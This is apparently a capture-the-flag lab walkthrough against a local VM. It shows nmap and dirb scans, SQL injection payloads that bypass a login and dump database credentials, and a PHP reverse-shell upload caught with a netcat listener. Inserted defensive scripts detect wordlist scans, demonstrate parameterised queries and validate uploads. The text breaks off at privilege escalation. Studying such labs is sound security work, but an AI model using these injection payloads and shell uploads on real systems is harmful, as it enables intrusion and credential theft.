Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-23 19:15 EDT
Nmap scan report for 192.168.1.109
Host is up (0.00016s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6b:a8:24:d6:09:2f:c9:9a:8e:ab:bc:6e:7d:4e:b9:ad (RSA)
| 256 ab:e8:4f:53:38:06:2c:6a:f3:92:e3:97:4a:0e:3e:d1 (ECDSA)
|_ 256 32:76:90:b8:7d:fc:a4:32:63:10:cd:67:61:49:d6:c4 (ED25519)
80/tcp open http Apache httpd 2.4.34 ((Ubuntu))
|_http-server-header: Apache/2.4.34 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 00:0C:29:BA:01:E1 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.83 seconds
Dirb
dirb http://192.168.1.109/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat May 23 19:18:32 2020
URL_BASE: http://192.168.1.109/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.109/ ----
+ http://192.168.1.109/index.php (CODE:200|SIZE:100)
+ http://192.168.1.109/server-status (CODE:403|SIZE:301)
==> DIRECTORY: http://192.168.1.109/uploads/
---- Entering directory: http://192.168.1.109/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sat May 23 19:18:38 2020
DOWNLOADED: 4612 - FOUND: 2
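The dirb run above is noisy by design: thousands of requests for unlinked paths, almost all answered with 404, from one client in a few seconds. As an added defender's-side example (not part of this write-up), the script below parses Apache combined-format access log lines and flags any client that hits more than a threshold of distinct non-existent paths inside a sliding time window. The log lines are constructed, and the window and threshold values are assumptions to tune for a real site.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" log format; only the fields needed for detection are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return a dict for a well-formed access log line, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "path": m["path"],
        "status": int(m["status"]),
    }


def find_bruteforcers(lines, window_s=60, threshold=20):
    """Map client IP -> peak number of distinct 404'd paths seen within any
    window_s-second window, for clients at or above the threshold."""
    events = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == 404:
            events[rec["ip"]].append((rec["ts"], rec["path"]))

    flagged = {}
    for ip, evs in events.items():
        evs.sort()
        peak = 0
        for i, (t0, _) in enumerate(evs):
            # distinct paths from this event until the window closes
            paths = {p for t, p in evs[i:] if (t - t0).total_seconds() <= window_s}
            peak = max(peak, len(paths))
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


def constructed_log():
    """Constructed sample: one wordlist scanner and one ordinary visitor."""
    lines = []
    base = "23/May/2020:19:18:%02d -0400"
    # scanner: 25 unlinked paths in about five seconds, every one a 404
    for i in range(25):
        lines.append(
            f'192.168.1.10 - - [{base % (32 + i // 5)}] "GET /dirb_word_{i} HTTP/1.1" '
            f'404 275 "-" "Mozilla/5.0"'
        )
    lines.append(
        '192.168.1.10 - - [23/May/2020:19:18:33 -0400] "GET /index.php HTTP/1.1" '
        '200 100 "-" "Mozilla/5.0"'
    )
    # ordinary visitor: a single missing favicon is not a scan
    lines.append(
        '192.168.1.20 - - [23/May/2020:19:20:01 -0400] "GET /favicon.ico HTTP/1.1" '
        '404 275 "-" "Mozilla/5.0"'
    )
    return lines


if __name__ == "__main__":
    print(find_bruteforcers(constructed_log()))
```

Counting distinct paths rather than raw requests keeps a browser that retries one broken link from being flagged, while a wordlist run trips the threshold almost immediately.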
Let's put the IP in the web browser.
We get a login form.
Then I click Sign Up Now.
After creating an account, log in.
Exploitation
SQL injection
I tried a few SQL injection payloads and successfully got one working using this input:
admin' or '1'='1'#
Then I open Burp, intercept the request to the welcome.php page and send it to Repeater.
Then I tried a UNION SELECT to test how many columns the query returns:
Anonymous' UNION SELECT 1,2,3#
The query returns a response to us, and it has 3 columns.
Then I use this query to extract all the database names:
Anonymous' UNION SELECT GROUP_CONCAT(SCHEMA_NAME),2,3 FROM information_schema.schemata#
We got a few here; let's see what is inside.
After going through every database, I found that the one with interesting tables is webapphacking, using this query:
Anonymous' UNION SELECT GROUP_CONCAT(TABLE_NAME),2,3 FROM information_schema.tables WHERE table_schema = "webapphacking"#
2 tables have been found, which are books and users.
After that, I extract the columns of both tables together using this query:
Anonymous' UNION SELECT GROUP_CONCAT(TABLE_NAME, ':', COLUMN_NAME),2,3 FROM information_schema.columns WHERE table_schema = "webapphacking"#
Got a lot of output; let's copy it and put it inside a file.
Then we can use sed to replace each comma with a newline; the command looks like this:
cat tables | sed 's/,/\n/g'
Then we can go through each of the column names; the most interesting ones are user and password.
Anonymous' UNION SELECT GROUP_CONCAT(user, ':',pasword),2,3 FROM webapphacking.users#
Then we get a very long result from the query; copy it to a file and use the sed command to separate it properly.
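Both payloads used above (the login bypass and the UNION dump) work for the same reason: the application pastes user input straight into SQL text. Added here as an example that is not part of the original write-up, the script below rebuilds a small stand-in for the webapphacking.users table in SQLite, runs a string-built query and a parameterised query side by side, and shows that the bound-parameter version returns nothing for either payload. The rows and secrets are constructed; the page's MySQL `#` comment is replaced by SQLite's `-- ` so the example runs offline, which is an assumption about syntax only.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the write-up's webapphacking.users table.
    Rows and secrets are constructed; the misspelt column 'pasword'
    mirrors the column name used in the page's own query."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, user TEXT, pasword TEXT, name TEXT)"
    )
    con.executemany(
        "INSERT INTO users (user, pasword, name) VALUES (?, ?, ?)",
        [("superadmin", "constructed-secret-1", "Super Admin"),
         ("Anonymous", "constructed-secret-2", "Anon")],
    )
    return con


# The page's payloads, with SQLite's '-- ' line comment standing in for MySQL's '#'
# (assumed so the example runs offline; the mechanics are identical).
BYPASS = "admin' or '1'='1'-- "
UNION = "Anonymous' UNION SELECT group_concat(user || ':' || pasword),2,3 FROM users-- "


def login_vulnerable(con, user, pw):
    """Login check built by string formatting: user input becomes SQL text."""
    sql = f"SELECT user FROM users WHERE user='{user}' AND pasword='{pw}'"
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(con, user, pw):
    """Same check with bound parameters: quotes and comments stay data."""
    row = con.execute(
        "SELECT user FROM users WHERE user=? AND pasword=?", (user, pw)
    ).fetchone()
    return row[0] if row else None


def profile_vulnerable(con, user):
    """welcome.php-style lookup that echoes three columns back to the page."""
    sql = f"SELECT id, user, name FROM users WHERE user='{user}'"
    return con.execute(sql).fetchall()


def profile_safe(con, user):
    """The same lookup with a bound parameter."""
    return con.execute(
        "SELECT id, user, name FROM users WHERE user=?", (user,)
    ).fetchall()


def leaked_credentials(rows):
    """Collect 'user:pasword' pairs from any row where an injected column landed."""
    leaked = set()
    for row in rows:
        if isinstance(row[0], str) and ":" in row[0]:
            leaked.update(row[0].split(","))
    return leaked


if __name__ == "__main__":
    con = make_db()
    print("string-built login accepted as:", login_vulnerable(con, BYPASS, "x"))
    print("parameterised login accepted as:", login_safe(con, BYPASS, "x"))
    print("leaked via UNION:", leaked_credentials(profile_vulnerable(con, UNION)))
    print("parameterised profile rows:", profile_safe(con, UNION))
```

With parameters bound, the driver never concatenates the input into the statement, so the trailing comment and the UNION are compared literally against the user column and match nothing. Storing passwords as salted hashes instead of plaintext is the second fix the dump makes obvious.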
John
Then we can log in with the superadmin account.
We get a page that lets us upload a file.
Reverse Shell
Then we need to change the IP and the port inside the file.
After that, upload it to the server.
Then we go to the /uploads/ directory that we discovered with dirb earlier.
First, we need to set up a listener on our machine:
Our machine
nc -nlvp 4444
As we can see, our file is there; click the reverseShell file.
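The upload form accepted a PHP file under its original name, stored it in a web-served, listable directory, and let Apache execute it. Added here as a defender's example (not code from the original write-up or the target application), the validator below applies the checks that would have stopped that chain: decide on the last extension only, require the file body to match the extension's magic bytes, refuse script markers anywhere in the body, and replace the client's filename with a random one. The allow-list and size limit are assumed policy values.

```python
import os
import secrets

# Allowed extensions and the magic bytes each must start with
# (assumed policy for an image/document upload form).
ALLOWED_MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "pdf": b"%PDF-",
}
MAX_BYTES = 2 * 1024 * 1024
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")


class UploadRejected(ValueError):
    """Raised when an upload fails a policy check; the message is safe to log."""


def validate_upload(filename, data):
    """Check an uploaded file and return the server-chosen name to store it under."""
    if len(data) > MAX_BYTES:
        raise UploadRejected("file too large")
    # Ignore any directory part the client sent (../ or C:\...): only the leaf matters.
    base = os.path.basename(filename.replace("\\", "/"))
    if not base or "." not in base:
        raise UploadRejected("missing extension")
    # Judge the LAST extension only: 'shell.png.php' is .php and refused outright,
    # 'shell.php.png' is .png and must then also carry PNG magic.
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_MAGIC:
        raise UploadRejected(f"extension .{ext} not allowed")
    if not data.startswith(ALLOWED_MAGIC[ext]):
        raise UploadRejected("content does not match extension")
    # A polyglot (valid image header followed by PHP) is still refused.
    if any(marker in data for marker in SCRIPT_MARKERS):
        raise UploadRejected("script markers inside file body")
    # Never keep the client's name: a random name defeats guessing /uploads/<name>.
    return f"{secrets.token_hex(16)}.{ext}"


def is_accepted(filename, data):
    """Convenience wrapper returning True/False instead of raising."""
    try:
        validate_upload(filename, data)
        return True
    except UploadRejected:
        return False


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + bytes(32)
    print("photo.png ->", validate_upload("photo.png", png))
    print("reverseShell.php accepted?", is_accepted("reverseShell.php", b"<?php /* constructed */ ?>"))
```

Validation alone is not enough: the directory that receives uploads should also be served with script execution disabled (for Apache with mod_php, `php_flag engine off` and `Options -Indexes`, the latter of which would also have removed the directory listing dirb reported), or better, kept outside the DocumentRoot and delivered through a download handler.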
Privilege Escalation
Go to the /home/legacy directory, where we can see a file called touchmenot.